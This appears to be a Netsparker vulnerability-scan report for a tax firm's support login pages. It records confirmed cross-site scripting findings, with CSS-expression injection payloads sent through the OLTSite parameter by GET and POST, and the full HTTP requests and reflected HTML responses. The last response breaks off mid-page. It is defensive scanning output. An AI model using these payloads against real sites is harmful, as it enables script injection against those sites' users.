Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Fri, 29-Apr-2011 23:24:49 GMT
RNT-Time: D=82420 t=1304118289063330
RNT-Machine: 10
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2313
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Support Login</title><script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></script></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=VVh55Ksk&amp;p_accessibility=1&amp;p_redirect=3">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=VVh55Ksk&amp;p_accessibility=1&amp;p_redirect=3">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=VVh55Ksk&amp;p_accessibility=1&amp;p_redirect=3">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=VVh55Ksk&amp;p_accessibility=1&amp;p_redirect=3">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="10"> &nbsp; </td> </tr> <tr><td colspan="8"></td></tr> <tr><td colspan="8"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><tr><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="form"><table cellpadding="2" cellspacing="2" border="0" width="100%"><!-- Returning Users ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td class="subtitle" colspan="2">Returning Users</td></tr><form class="minimal" name="_validate" method="post" action="acct_login_submit.php"><input type="hidden" name="OLTSite" value="&quot; stYle=x:expre/**/ssion(netsparker(9)) ns=&quot; " /><input type="hidden" name="p_accessibility" value="1" /><input type="hidden" name="p_redirect" value="3" /><input type="hidden" name="p_sid" value="VVh55Ksk" /><input type="hidden" name="p_next_page" value="myovr.php" /><tr><td class="label" align="right" nowrap><label for="p_userid">Username</label>:</td><td><input name="p_userid" id="p_userid" type="text" size="30" maxlength="80" /></td></tr><tr><td class="label" align="right" nowrap><label for="p_passwd">Password</label>:</td><td><input name="p_passwd" id="p_passwd" type="password" size="20" maxlength="20" /></td></tr><tr><td></td><td><input type="submit" value="&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Log In&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;" class="btn" tabindex="0" name="login_btn" /></td></tr></form><!-- Forgotten User ID/Password ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td><font size="-9">&nbsp;</font></td></tr><tr><td class="subtitle" colspan="2">If you forgot your Username or Password...</td></tr><tr><td></td><td><form class="minimal" name="_assist" method="post" action="acct_assistance.php"><input type="hidden" name="p_sid" value="VVh55Ksk" /><input type="hidden" name="p_lva" value="" /><input type="hidden" name="p_sp" value="" /><input type="hidden" name="p_li" value="" /><input type="hidden" name="p_accessibility" value="1" /><input type="hidden" name="p_redirect" value="3" /><input type="submit" value="Go To Account Assistance" class="btn" tabindex="0" name="email_passwd_btn" /></td></tr></form><!-- New Users ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td><font size="-9">&nbsp;</font></td></tr><tr><td class="subtitle" colspan="2">If you do not have an account...</td></tr><tr><td></td><td><form class="minimal" name="_new" method="post" action="acct_new.php"><input type="hidden" name="p_sid" value="VVh55Ksk" /><input type="hidden" name="p_lva" value="" /><input type="hidden" name="p_sp" value="" /><input type="hidden" name="p_li" value="" /><input type="hidden" name="p_next_page" value="myovr.php" /><input type="hidden" name="p_accessibility" value="1" /><input type="hidden" name="p_redirect" value="3" /><input type="submit" value="Create a New Account" class="btn" tabindex="0" name="create_acct_btn" /></td></tr></form></table></td><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td></tr><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/bl.gif" alt="" /></td><td class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/br.gif" alt="" /></td></tr></table><br /><p><table border="0" cellpadding="0" cellspacing="0" width="790" background="https://www.olt.com/main/home/images/back-tiles.gif"> <tr> <td height=17> <div class="foot"> <a href="https://www.olt.com/main/home/default.asp">Home</a> | <a href="https://www.olt.com/main/home/about.asp">About Us</a> | <a href="https://www.olt.com/main/home/payment.asp">Payment Options</a> | <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> | <a href="https://www.olt.com/main/home/states.asp">States</a> | <a href="https://www.olt.com/main/home/getstarted.asp">Get Started</a> | <a href="https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php">Customer Service Live help</a> </div> </td> </tr></table><div class="tiny"> <a href="https://www.olt.com/main/home/privacysecurity.asp">Privacy/Security</a> | <a href="https://www.olt.com/main/home/disclaimer.asp">Disclaimer/Terms Of Use</a> | <a href="https://www.olt.com/main/home/sitemap.asp">Site Map</a> | <a href="https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php">Customer Service Live help</a> <br><br> &copy; On-Line Taxes, Inc.<br> 724 Jules Street<br> St Joseph, MO 64501<br> Ph: 1-816-232-0095 | Fax: 1-816-232-1591 </div><script type="text/javascript">_set_cursor();</script></body></html>
- /cgi-bin/olt.cfg/php/enduser/acct_login.php

/cgi-bin/olt.cfg/php/enduser/acct_login.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=%22%20stYle=x:expre/**/s..

Parameters

Parameter Type Value
OLTSite GET " stYle=x:expre/**/ssion(alert(9)) ns="
p_sid GET TyYLtJsk
p_accessibility GET 0
p_redirect GET 3

Request

GET /cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=%22%20stYle=x:expre/**/ssion(netsparker(9))%20ns=%22%20&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=3 HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=&p_next_page=acct_login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 23:05:16 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Fri, 29-Apr-2011 23:25:16 GMT
RNT-Time: D=87061 t=1304118316635526
RNT-Machine: 01
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2314
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Support Login</title><script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></script></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=V4bc5Ksk&amp;p_accessibility=1&amp;p_redirect=3">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="tab" name="ask_a_question_tab_link" href="ask.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=V4bc5Ksk&amp;p_accessibility=1&amp;p_redirect=3">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=V4bc5Ksk&amp;p_accessibility=1&amp;p_redirect=3">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=V4bc5Ksk&amp;p_accessibility=1&amp;p_redirect=3">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="10"> &nbsp; </td> </tr> <tr><td colspan="8"></td></tr> <tr><td colspan="8"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="4" alt="" /></td></tr></table><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/tl.gif" alt="" /></td><td width="100%" class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/tr.gif" alt="" /></td></tr><tr><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td class="form"><table cellpadding="2" cellspacing="2" border="0" width="100%"><!-- Returning Users ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td class="subtitle" colspan="2">Returning Users</td></tr><form class="minimal" name="_validate" method="post" action="acct_login_submit.php"><input type="hidden" name="OLTSite" value="&quot; stYle=x:expre/**/ssion(netsparker(9)) ns=&quot; " /><input type="hidden" name="p_sid" value="V4bc5Ksk" /><input type="hidden" name="p_accessibility" value="1" /><input type="hidden" name="p_redirect" value="3" /><input type="hidden" name="p_next_page" value="myovr.php" /><tr><td class="label" align="right" nowrap><label for="p_userid">Username</label>:</td><td><input name="p_userid" id="p_userid" type="text" size="30" maxlength="80" /></td></tr><tr><td class="label" align="right" nowrap><label for="p_passwd">Password</label>:</td><td><input name="p_passwd" id="p_passwd" type="password" size="20" maxlength="20" /></td></tr><tr><td></td><td><input type="submit" value="&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Log In&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;" class="btn" tabindex="0" name="login_btn" /></td></tr></form><!-- Forgotten User ID/Password ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td><font size="-9">&nbsp;</font></td></tr><tr><td class="subtitle" colspan="2">If you forgot your Username or Password...</td></tr><tr><td></td><td><form class="minimal" name="_assist" method="post" action="acct_assistance.php"><input type="hidden" name="p_sid" value="V4bc5Ksk" /><input type="hidden" name="p_lva" value="" /><input type="hidden" name="p_sp" value="" /><input type="hidden" name="p_li" value="" /><input type="hidden" name="p_accessibility" value="1" /><input type="hidden" name="p_redirect" value="3" /><input type="submit" value="Go To Account Assistance" class="btn" tabindex="0" name="email_passwd_btn" /></td></tr></form><!-- New Users ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><tr><td><font size="-9">&nbsp;</font></td></tr><tr><td class="subtitle" colspan="2">If you do not have an account...</td></tr><tr><td></td><td><form class="minimal" name="_new" method="post" action="acct_new.php"><input type="hidden" name="p_sid" value="V4bc5Ksk" /><input type="hidden" name="p_lva" value="" /><input type="hidden" name="p_sp" value="" /><input type="hidden" name="p_li" value="" /><input type="hidden" name="p_next_page" value="myovr.php" /><input type="hidden" name="p_accessibility" value="1" /><input type="hidden" name="p_redirect" value="3" /><input type="submit" value="Create a New Account" class="btn" tabindex="0" name="create_acct_btn" /></td></tr></form></table></td><td class="form"><img height="1" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td></tr><tr><td align="right"><img height="6" width="6" src="/rnt/rnw/img/enduser/bl.gif" alt="" /></td><td class="form"><img height="6" width="1" src="/rnt/rnw/img/trnsp.gif" alt="" /></td><td align="left"><img height="6" width="6" src="/rnt/rnw/img/enduser/br.gif" alt="" /></td></tr></table><br /><p><table border="0" cellpadding="0" cellspacing="0" width="790" background="https://www.olt.com/main/home/images/back-tiles.gif"> <tr> <td height=17> <div class="foot"> <a href="https://www.olt.com/main/home/default.asp">Home</a> | <a href="https://www.olt.com/main/home/about.asp">About Us</a> | <a href="https://www.olt.com/main/home/payment.asp">Payment Options</a> | <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> | <a href="https://www.olt.com/main/home/states.asp">States</a> | <a href="https://www.olt.com/main/home/getstarted.asp">Get Started</a> | <a href="https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php">Customer Service Live help</a> </div> </td> </tr></table><div class="tiny"> <a href="https://www.olt.com/main/home/privacysecurity.asp">Privacy/Security</a> | <a href="https://www.olt.com/main/home/disclaimer.asp">Disclaimer/Terms Of Use</a> | <a href="https://www.olt.com/main/home/sitemap.asp">Site Map</a> | <a href="https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php">Customer Service Live help</a> <br><br> &copy; On-Line Taxes, Inc.<br> 724 Jules Street<br> St Joseph, MO 64501<br> Ph: 1-816-232-0095 | Fax: 1-816-232-1591 </div><script type="text/javascript">_set_cursor();</script></body></html>
- /cgi-bin/olt.cfg/php/enduser/acct_login_submit.php

/cgi-bin/olt.cfg/php/enduser/acct_login_submit.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login_submit.php

Parameters

Parameter Type Value
login_btn POST         Log In        
OLTSite POST " stYle=x:expre/**/ssion(alert(9)) ns="
p_accessibility POST 0
p_next_page POST acct_login.php
p_passwd POST 3
p_redirect POST 3
p_sid POST TyYLtJsk
p_userid POST 3

Request

POST /cgi-bin/olt.cfg/php/enduser/acct_login_submit.php HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=&p_next_page=acct_login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Content-Length: 275
Accept-Encoding: gzip, deflate

login_btn=%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0Log+In%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0%c2%a0&OLTSite=%22+stYle%3dx%3aexpre%2f**%2fssion(netsparker(9))+ns%3d%22+&p_accessibility=0&p_next_page=acct_login.php&p_passwd=3&p_redirect=3&p_sid=TyYLtJsk&p_userid=3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 23:05:55 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=175001 t=1304118355933158
RNT-Machine: 01
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 2023
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Login Failed</title></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><form class="block" action="dummy"><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=" stYle=x:expre/**/ssion(netsparker(9)) ns=" &p_sid=TyYLtJsk&amp;p_accessibility=1&amp;p_redirect=3">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" 